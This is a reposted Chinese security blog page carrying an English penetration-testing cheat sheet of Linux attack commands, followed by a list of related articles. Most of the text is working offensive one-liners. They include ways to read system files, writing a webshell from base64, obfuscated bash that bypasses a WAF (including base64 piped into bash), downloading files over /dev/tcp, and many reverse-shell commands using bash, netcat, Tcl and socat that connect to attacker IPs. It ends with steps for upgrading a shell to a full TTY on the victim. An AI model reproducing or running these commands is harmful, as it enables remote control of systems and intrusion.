专栏首页逢魔安全实验室Some Linux Hacking Tricks

Some Linux Hacking Tricks

There is always a method here is useful for you to penetrantion testing :)

Some ways to read system files

 1cat /etc/issue
 2tac /etc/issue
 3less /etc/issue
 4more /etc/issue
 5head /etc/issue
 6tail /etc/issue
 7nl /etc/issue
 8xxd /etc/issue
 9sort /etc/issue
10uniq /etc/issue
11strings /etc/issue
12sed -n '1,10p' /etc/issue
13grep . /etc/issue
14python -c "print(open('/etc/issue').read())"
15perl -F: -lane 'print "@F[0..4]\n"' /etc/issue
16ruby -e 'IO.foreach("/etc/issue"){|a| print a}'
17php -r "echo file_get_contents('/etc/issue');"
18echo $(</etc/issue) or echo `</etc/issue`
19awk '{print $0}' /etc/issue
20base64 -i /etc/issue
21dd count=1000 bs=1 if=/etc/issue 2>/dev/null
22egrep|fgrep|rgrep|agrep "" /etc/issue
23rev /etc/issue
24comm /etc/issue /etc/issue
25paste /etc/issue

Echo a large file to the file System

1echo -n "aGVsbG8gd29ybGQK"|base64 -d > webshell.jsp

Execute commands in bash to bypass waf

1# cat /etc/issue
2$1c$2a$3t$IFS/$4e$5t$6c/$7i$8s$9s$1u$1e 
3{cat,/etc/issue}
4cat<>/etc/issue
5CMD=$'\x20/etc/issue'&&cat$CMD
6echo Y2F0IC9ldGMvaXNzdWU=|base64 -d|bash

Download file without nc&wget

1exec 5<>/dev/tcp/ip/port &&echo -e "GET /filename HTTP/1.0\n" >&5 && cat<&5 > filename

Create An Interactive Shell

 1# Use Bash
 2$ bash -i >& /dev/tcp/192.168.68.206/2333 0>&1
 3$ exec 196<>/dev/tcp/192.168.68.206/2333; sh <&196 >&196 2>&196
 4$ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | while read line; do $line 2>&5 >&5;done
 5$ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done
 6
 7# Use Netcat
 8$ nc -e /bin/sh 192.168.68.206 2333  
 9$ mkfifo fifo ; nc.traditional -u 192.168.199.199 5555 < fifo | { bash -i; } > fifo
10$ nc 192.168.199.199 5555 -c /bin/bash
11$ if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.199.199 5555 > /tmp/f
12$ if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc 192.168.199.199 5555 0</tmp/f|/bin/bash 1>/tmp/f
13$ nc 192.168.68.206 2333|/bin/sh|nc 192.168.68.206 2444  
14
15# Use TCHsh
16$ echo 'set s [socket 192.168.199.199 5555];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh # tcp
17
18# Use Socat
19$ socat tcp-connect:192.168.199.199:5555 exec:"bash -li",pty,stderr,setsid,sigint,sane # tcp
20
21## Full list please read my blog
22## http://reverse-tcp.xyz/2017/01/08/Some-Ways-To-Create-An-Interactive-Shell-On-Linux/

Use rlwrap to run netcat and create a listening port

1# Allow the editing of keyboard input for any other command.
2rlwrap -S "$(printf '\033[95mFS>\033[m ')" nc -lvvp 4444

Upgrading simple shells to fully interactive TTYs

 1## use Python to spawn a pty
 2python -c 'import pty; pty.spawn("/bin/bash")'
 3
 4## Using socat
 5# Socat is like netcat and it can be used to pass full TTY's over TCP connections.
 6# If socat isn't installed, you can download id from here : https://github.com/andrew-d/static-binaries
 7# On Attack Host
 8socat file:`tty`,raw,echo=0 tcp-listen:4444 
 9# On Victim
10socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
11
12## Using Expect
13cat sh.exp
14#!/usr/bin/expect
15# Spawn a shell, then allow the user to interact with it.
16# The new shell will have a good enough TTY to run tools like ssh, su and login
17spawn sh
18interact
19# In reverse shell
20expect sh.exp
21
22## Using stty options
23#
24# In reverse shell
25python -c 'import pty; pty.spawn("/bin/bash")'
26Ctrl-Z
27# In attack shell
28stty raw -echo
29fg
30# In reverse shell
31reset
32export SHELL=bash
33export TERM=xterm-256color
34stty rows <num> columns <cols>

One command to locate the web path

1find / -type f -name "*.*" | xargs grep "htmlstring"

本文分享自微信公众号 - 逢魔安全实验室(FormSec),作者:风流

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-05-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 铁人三项2018 pwn [aleph1] Writeup

    本文内容比较多,建议点击https://blog.formsec.cn/2018/06/11/%E9%93%81%E4%BA%BA%E4%B8%89%E9%A1...

    xfkxfk
  • DedeCMS任意用户密码重置漏洞

    综述 2018年01月09日,Dedecms官方更新了DedeCMS V5.7 SP2正式版,后续在10日有网友爆出其存在任意用户密码重置漏洞。...

    xfkxfk
  • Grammarly For Chrome扩展任意用户劫持漏洞分析

    ? 01 — 综述 2018年02月02日,Grammarly官方更新了Grammarly for Chrome 14.826.1446版本,其中修复了一个严...

    xfkxfk
  • Some Linux Hacking Tricks

    There is always a method here is useful for you to penetration test :)

    风流
  • 取代PHP原生函数的一些扩展包

    你可以用guzzlehttp完全取代curl,file_get_content,fopen等函数。这个扩展包使用起来极为顺手。我们在代码量上看下对比。

    CrazyCodes
  • 【推荐收藏】倾心整理的Python量化资源大合集

    随着Python编程语言的流行和普及,越来越多人对如何应用Python做金融数据分析和量化交易充满兴趣。但是不少人对量化投资本身存在一定的误解或认识不清,有的人...

    量化小白
  • tinyML Summit - Syntiant&Sensory以及

    由Syntiant CTO于2020年tinyML上的演讲,介绍了Syntiant已量产的NDP100, 专为电池驱动的实时语音和音频识别应用。其不同于传统的D...

    用户6026865
  • Windows下Aria2一键启动器【用以下载百度网盘】详细教程

    Aria2 下载整合一键工具是由吾爱论坛一位网友制作的,因为纯aria2是命令行,对于普通人员来说不方便使用。于是这个一键启动就有很多人制作了,这里只推荐这一款...

    无道
  • 【精心解读】关于Jupyter Notebook的28个技巧

    Jupyter具有很强的可扩展性,支持许多编程语言,可以很容易地托管在计算机上或几乎所有的服务器上,只需要拥有ssh或http访问权限。 最重要的是,它是完全免...

    量化投资与机器学习微信公众号
  • Nuxt使用axios跨域问题解决方法

    Nuxt 是 Vue 项目服务器端渲染(SSR)解决方案。而在使用时,就会遇到前后端分离情况下的域名或端口不一致导致的跨域问题。本文将介绍如何通过设置代理解决 ...

    用户6167509

扫码关注云+社区

领取腾讯云代金券